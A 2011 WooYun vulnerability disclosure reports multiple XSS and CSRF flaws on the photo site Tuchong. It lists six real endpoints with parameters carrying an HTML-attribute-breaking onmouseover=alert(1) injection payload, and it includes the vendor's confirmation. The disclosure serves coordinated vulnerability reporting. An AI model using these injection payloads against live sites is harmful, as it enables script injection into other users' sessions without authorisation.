当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01601

漏洞标题:图虫多处XSS, CSRF漏洞

相关厂商:图虫网

漏洞作者: 沙比拍照的

提交时间:2011-03-15 10:28

修复时间:2011-04-14 12:00

公开时间:2011-04-14 12:00

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-03-15: 细节已通知厂商并且等待厂商处理中
2011-03-15: 厂商已经确认,细节仅向厂商公开
2011-03-25: 细节向核心白帽子及相关领域专家公开
2011-04-04: 细节向普通白帽子公开
2011-04-14: 细节向实习白帽子公开
2011-04-14: 细节向公众公开

简要描述:

图虫网存在多个XSS, CSRF漏洞.

详细说明:

FOUND XSS: [ POST ] http://www.tuchong.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/edit/
Parameters: 535408%5Btitle%5D='><input value=shit onmouseover=alert(1)><k v='&535408%5Btags%5D=adsfadfsasd&535408%5Bdescription%5D=asdfahiadfa&
Action URL: http://space.tuchong.com/34855/photos/


FOUND XSS: [ POST ] http://space.tuchong.com/api/album/create/
Parameters: alb_title="><input value=shit onmouseover=alert(1)><k v="&alb_description=test&
Action URL: http://www.tuchong.com/album/23209/


FOUND XSS: [ POST ] http://space.tuchong.com/api/reply/add/
Parameters: format=html&cmt_parent_id="><input value=shit onmouseover=alert(1)><k v="&cmt_content=shi&cmt_resource_id=34855&cmt_type=user&
Action URL: http://space.tuchong.com/api/reply/add/


FOUND XSS: [ POST ] http://www.tuchong.com/api/reply/add/
Parameters: cmt_parent_id="><input value=shit onmouseover=alert(1)><k v="&format=html&cmt_type=album&cmt_content=fuck&from_type=album&anonymous=on&cmt_resource_id=23198&from_id=23198&
Action URL: http://www.tuchong.com/api/reply/add/


Found Saved XSS: [ GET ] http://www.tuchong.com/album/23198/?style=thumbnail
Parameters: alb_title="><input value=shit onmouseover=alert(1)><k v="&alb_description=test&
Action URL: http://space.tuchong.com/api/album/create/


Found Saved XSS: [ GET ] http://space.tuchong.com/34855/albums/
Parameters: alb_title='><input value=shit onmouseover=alert(1)><k v='&alb_description=test&
Action URL: http://space.tuchong.com/api/album/create/


漏洞证明:

look at

http://space.tuchong.com/34855/

修复方案:

I/O Filter plz...

版权声明:转载请注明来源 沙比拍照的@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2011-03-15 11:11

厂商回复:

开发的时候没有注意, 漏了做过滤转义, 导致出现如此低级的bug
非常感谢!
我们会尽快修正

最新状态:

暂无


漏洞评价:

评论